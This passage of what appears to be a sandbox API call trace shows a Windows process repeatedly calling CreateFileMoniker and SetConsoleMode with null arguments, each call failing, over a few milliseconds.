0 [0036.411] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.411] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.411] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.411] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.411] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.411] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.411] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.412] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.412] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.412] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.412] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.412] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.412] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.412] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.412] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.412] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.412] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.412] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.412] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.412] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.412] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.412] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.412] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.412] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.412] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.412] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.412] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.412] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.412] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.412] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.412] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.412] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.412] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.412] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.413] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.413] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.413] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.413] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.413] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.413] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.413] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.413] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.413] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.413] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.413] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.413] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.413] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.413] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.413] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.413] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.413] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.413] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.413] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.413] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.413] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.413] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.413] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.413] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.413] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.413] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.413] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.414] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.414] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.414] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.414] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.414] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.414] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.414] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.414] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.414] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.414] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.414] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.414] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.414] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.414] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.414] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.414] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.414] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.414] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.414] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.414] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.414] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.414] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.414] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.414] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.414] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.414] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.414] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.415] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.415] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.415] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.415] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.415] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.415] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.415] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.415] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.415] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.415] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.415] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.415] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.415] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.415] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.415] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.415] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.415] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.415] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.415] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.415] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.415] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.415] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.415] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.415] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.415] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.415] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.415] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.416] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.416] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.416] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.416] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.416] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.416] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.416] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.416] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.416] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.416] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.416] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.416] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.416] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.416] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.416] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.416] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.416] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.416] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.416] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.416] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.416] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.416] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.416] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.416] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.416] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.416] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.416] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.417] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.417] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.417] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.417] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.417] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.417] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.417] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.417] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.417] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.417] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.417] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.417] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.417] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.417] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.417] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.417] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.417] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.417] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.417] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.417] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.417] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.417] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.417] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.417] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.417] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.417] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.417] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.418] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.418] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.418] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.418] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.418] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.418] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.418] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.418] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.418] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.418] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.418] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.418] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.418] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.418] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.418] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.418] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.418] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.418] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.418] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.418] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.419] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.419] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.419] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.419] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.419] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.419] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.419] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.419] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.419] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.419] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.419] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.419] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.420] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.420] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.420] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.420] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.420] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.420] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.420] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.420] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.421] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.421] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.421] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.421] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.421] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.421] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.421] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.421] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.421] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.421] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.421] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.421] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.422] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.422] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.422] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.422] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.422] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.422] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.422] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.422] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.422] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.422] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.422] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.422] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.422] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.422] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.423] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.423] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.423] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.423] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.423] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.423] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.423] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.423] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.423] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.423] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.423] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.423] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.423] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.424] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.424] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.424] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.424] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.424] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.424] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.424] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.424] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.424] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.424] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.424] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.424] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.424] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.425] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.425] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.425] SetConsoleMode (hConsoleHandle=0x0, dwMode=0x0) returned 0 [0036.425] CreateFileMoniker (in: lpszPathName=0x0, ppmk=0x12fe80 | out: ppmk=0x12fe80*=0x0) returned 0x800401e4 [0036.425] 